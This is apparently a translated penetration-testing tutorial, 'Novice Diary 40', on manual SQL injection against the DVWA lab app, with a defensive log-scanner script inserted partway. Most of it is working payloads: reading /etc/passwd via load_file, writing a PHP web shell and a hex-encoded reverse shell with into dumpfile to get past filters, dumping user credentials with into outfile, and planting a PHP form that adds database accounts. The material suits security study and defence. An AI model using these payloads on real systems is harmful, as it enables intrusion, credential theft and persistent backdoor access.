SQL Manual Injection
1. Reading files (the load_file() function)
' union select NULL,load_file('/etc/passwd')--+
(send the request with Burp Suite)
2. Writing Files
' union select NULL,'<?php passthru($_GET["cmd"]);?>' into dumpfile '/var/www/a.php'--+ "writes a web trojan; into dumpfile is a MySQL clause that writes the selected content out to a file on the database server"
### This statement usually fails with a "cannot write" error because of missing permissions: the account that MySQL runs as needs write access to the target directory.
' union select NULL,'<?php passthru($_GET["cmd"]);?>' into dumpfile 'a.php'--+ "with a bare file name (in single quotes) the file goes to the default path, the current database's data directory: /var/lib/mysql/dvwa/a.php (the directory of the dvwa database)"
# When there is no permission to write to the intended directory, combine the write with a file inclusion vulnerability
First write to the world-writable /tmp/ directory, then include the file through the file inclusion vulnerability.
' union select NULL,'<?php passthru($_GET["cmd"]);?>' into dumpfile '/tmp/a.php'--+
# A reverse shell can also be written to the server this way
Note: when the web trojan is injected through the URL, the characters "<", "?", "php" and ">" may trigger the filtering mechanism, so encode the payload to bypass it.
### Convert the web trojan into its hexadecimal (binary) form; the database decodes the hex literal and into dumpfile stores it as PHP code.
Copy the reverse shell script
Change the IP address in the reverse shell
Encode it:
cat b.php | xxd -ps "xxd: hex dump tool that ships with Linux; -ps: output a plain hex dump"
# The hex output contains newlines, so we need to clean it up with one more pipe.
cat b.php | xxd -ps | tr -d '\n' "tr -d: delete the given characters"
Then replace the plaintext trojan in the payload with the encoded ciphertext
(in the form 0x<hex>)
3. Exporting data to a file ("dumping the database", 拖库)
' union select NULL,CONCAT(user,0x3a,password) from users into outfile '/tmp/a.db'--+
# If there is no file inclusion or similar vulnerability with which to download the dump file, the data can still be stolen step by step: restrict each query with LIMIT and copy and paste the results.
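From the defender's side, the three payload families above (load_file(), into dumpfile/outfile, and the hex-encoded trojan) all leave traces in the web server's access log. The following is an added example, not code from the original post: a small log scanner that URL-decodes each request, expands MySQL 0x hex literals so the encoding bypass described above does not hide the PHP tag, and reports which indicators each request matched. The log lines, the Apache-style log format and the indicator names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined style); not taken from the original post.
# Line 3 carries its payload as a MySQL hex literal, the bypass the notes describe
# (here the harmless "<?php echo 1; ?>" is encoded, so the sample itself is benign).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%27+union+select+NULL%2Cload_file%28%27%2Fetc%2Fpasswd%27%29--+ HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /dvwa/vulnerabilities/sqli/?id=%27+union+select+NULL%2C0x3c3f706870206563686f20313b203f3e+into+dumpfile+%27%2Ftmp%2Fa.php%27--+ HTTP/1.1" 200 0
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
HEX_LITERAL_RE = re.compile(r"0x([0-9a-f]{2,})", re.IGNORECASE)

# Indicator names are this example's own; each pattern is matched against the
# URL-decoded, hex-expanded, whitespace-collapsed, lower-cased request.
INDICATORS = {
    "union_select": re.compile(r"union\s+(all\s+)?select"),
    "file_read": re.compile(r"load_file\s*\("),
    "file_write": re.compile(r"into\s+(dumpfile|outfile)"),
    "php_tag": re.compile(r"<\?php"),
}

def expand_hex_literals(text: str) -> str:
    """Replace MySQL 0x... literals with their decoded text so hex-hidden payloads become visible."""
    def decode(m):
        digits = m.group(1)
        if len(digits) % 2:          # odd length cannot be a byte string; leave it untouched
            return m.group(0)
        return bytes.fromhex(digits).decode("utf-8", errors="replace")
    return HEX_LITERAL_RE.sub(decode, text)

def normalize_request(line: str) -> str:
    """Extract the request target from a log line and bring it into a comparable form."""
    m = REQUEST_RE.search(line)
    if not m:
        return ""
    decoded = expand_hex_literals(unquote_plus(m.group(1)))
    return re.sub(r"\s+", " ", decoded).lower()

def scan_log(log_text: str) -> list:
    """Return (line_number, [indicator names]) for every request matching at least one indicator."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        req = normalize_request(line)
        names = [k for k, pat in INDICATORS.items() if pat.search(req)]
        if names:
            hits.append((n, names))
    return hits

if __name__ == "__main__":
    for n, names in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(names)}")
```

On the sample log the first request is clean, the second is flagged as union_select and file_read, and the third as union_select, file_write and php_tag even though no "<?php" appears in the raw URL.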
When uploading a webshell does not achieve the goal, server-side code can be written for one's own purposes.
# This requires enough knowledge of the target: database structure, table structure and the program's logic.
Create a form that inserts an account into the users table "because the hashed passwords stored in the database are hard to crack", which amounts to developing a feature of your own. The double backslashes in the INSERT line are needed so that MySQL's escaping of the string literal leaves \" in the written PHP file.
' union select NULL,'<?php
if (isset($_POST["Submit"])) {
    $userID = $_POST["userID"]; $first_name = $_POST["first_name"]; $last_name = $_POST["last_name"];
    $username = $_POST["username"]; $avatar = $_POST["avatar"];
    echo "UserID: $userID<br>"; echo "First_Name: $first_name<br>"; echo "Last_Name: $last_name<br>";
    echo "Username: $username<br>"; echo "Avatar: $avatar<br>";
    $con = mysqli_connect("127.0.0.1", "root", "", "dvwa");
    if (mysqli_connect_errno()) { echo "Failed to connect to MySQL: " . mysqli_connect_error(); }
    else { echo "Connected to database<br>"; }
    $password = "123";
    $sql = "INSERT INTO dvwa.users VALUES (\\"$userID\\", \\"$first_name\\", \\"$last_name\\", \\"$username\\", MD5(\\"$password\\"), \\"$avatar\\")";
    if (mysqli_query($con, $sql)) { echo "[successful insertion]: $sql"; }
    else { echo "Error creating database: " . mysqli_error($con); }
    mysqli_close($con);
}
?>
<form method="POST" action="<?php echo $_SERVER["PHP_SELF"]; ?>">
    <input type="text" name="userID" value=""><br>
    <input type="text" name="first_name" value="FH"><br>
    <input type="text" name="last_name" value="y"><br>
    <input type="text" name="username" value="YFH"><br>
    <input type="text" name="avatar" value="yfh!"><br>
    <input type="submit" name="Submit" value="Submit Form"><br>
</form>' into dumpfile '/tmp/user.php'--+
Novice Diary 40: Kali Penetration Testing - Web Penetration - SQL Manual Injection (II) - reading files, writing files, reverse shell